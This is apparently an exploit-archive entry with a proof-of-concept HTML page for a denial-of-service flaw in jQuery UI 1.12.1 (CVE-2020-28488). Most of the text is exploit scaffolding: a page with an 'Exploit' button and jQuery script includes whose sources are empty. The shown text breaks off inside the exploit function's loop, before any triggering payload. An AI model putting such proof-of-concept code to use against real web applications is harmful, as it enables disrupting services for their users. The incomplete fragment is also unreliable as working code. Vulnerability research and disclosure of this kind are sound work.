Authored by Rafael Cintra Lopes

jQuery UI version 1.12.1 suffers from a denial of service vulnerability.

# Exploit Title: jQuery UI 1.12.1 - Denial of Service (DoS)
# Date: 20 Jan, 2021
# Exploit Author: Rafael Cintra Lopes
# Vendor Homepage:
# Software Link:
# Version: <= 1.12.1
# CVE : CVE-2020-28488

<!DOCTYPE html>
<html lang="en">
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>DoS - jQuery UI 1.12.1</title>
<h2>DoS - jQuery UI 1.12.1</h2>

<button onclick="exploit()">Exploit</button>

<p>PoC by Rafael Cintra Lopes</p>

<script src="" integrity="sha256-9/aliU8dGd2tb6OSsuzixeV4y/faTqgFtohetphbbj0=" crossorigin="anonymous"></script>
<script src="" integrity="sha256-VazP97ZCwtekAsvgPBSUwPFKdrwD3unUfSGVYrahUqU=" crossorigin="anonymous"></script>

function exploit(){
for (var i = 0; i < 10; i++) {